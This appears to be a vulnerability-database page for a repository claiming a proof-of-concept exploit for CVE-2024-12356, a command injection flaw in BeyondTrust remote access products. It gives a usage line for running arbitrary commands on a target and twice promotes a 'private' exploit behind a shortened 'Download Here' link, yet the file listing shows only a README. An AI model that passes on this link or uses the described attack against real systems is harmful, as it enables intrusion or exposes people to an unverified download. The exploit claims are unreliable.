CVE-2024-12356 PoC — BeyondTrust Remote Support和BeyondTrust Privileged Remote Access 安全漏洞

Source

Associated Vulnerability

Description

CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)

Readme

# CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)

## Overview

A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. This is a command injection vulnerability, classified under CWE-77 (Improper Neutralization of Special Elements used in a Command).


## Details
+ CVE ID: CVE-2024-12356
+ Published: 2024-12-16
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8
+ Vendor: **BeyondTrust**


## Exploit
**[Download Here](https://bit.ly/3OZPYhj)**


## Vulnerability Description

The impact of this vulnerability is severe. It allows unauthenticated attackers to execute arbitrary commands with the privileges of a site user. This leads to unauthorized access, data breaches, system compromise, and full control over the affected systems. The attack vector is Network-based, requires no user interaction, and has low attack complexity, making it relatively easy for attackers to exploit.


## Usage

```
python CVE-2024-12356.py -h 10.10.10.10 -c 'uname -a'
```


## Affected Versions

**affected from 0 through 24.3.1**


## Exploit
**[Download Here](https://bit.ly/3OZPYhj)**


## Contact
For inquiries, please contact cloudefence@thesecure.biz

File Snapshot

 [4.0K]  /data/pocs/2b284838648f55597905c81fcc1b49c83f9cacdf
└── [1.4K]  README.md

0 directories, 1 file

Remarks